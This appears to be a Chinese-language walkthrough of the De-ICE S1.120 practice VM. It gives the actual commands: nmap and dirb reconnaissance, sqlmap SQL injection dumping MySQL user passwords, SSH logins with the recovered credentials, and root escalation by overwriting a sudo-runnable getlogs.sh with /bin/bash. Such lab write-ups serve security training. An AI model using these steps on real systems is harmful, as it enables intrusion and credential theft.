De-ICE_S1.120靶机
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段
一、信息收集
nmap扫描端口,开启了21、22、80、443、3306端口
nmap 192.168.1.120 -p- -sV -Pn -O
目录扫描
dirb http://192.168.1.120/
存在phpmyadmin,访问无法连接,被拒绝
访问80端口的web页面
点击Add Product,发现一个表单
点击View Products,页面中看到url带有id参数,id=NULL
测一下sql注入
爆库名
爆mysql用户名密码
python3 sqlmap.py -u "http://192.168.1.120/products.php?id=NULL" -D mysql --users --passwords --batch
二、getshell
ssh连接
aadams:princess
ssh aadams@192.168.1.120
三、提权
执行命令,枚举SUID权限的二进制文件
find / -perm -u=s -type f 2>/dev/null
尝试利用时,发现aadams不在sudoers中,换其他用户,并执行命令,枚举SUID权限的二进制文件
ccoffee:iloveyou
ssh ccoffee@192.168.1.120
find / -perm -u=s -type f 2>/dev/null
这里看到ccoffee用户,有一个getlogs.sh启用了SUID,可以执行命令
到该目录下,将getlogs.sh备份,并创建一个新的getlogs.sh文件
cd /home/ccoffee/scripts/
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" > getlogs.sh
chmod 777 getlogs.sh
sudo执行getlogs.sh,提权成功
sudo /home/ccoffee/scripts/getlogs.sh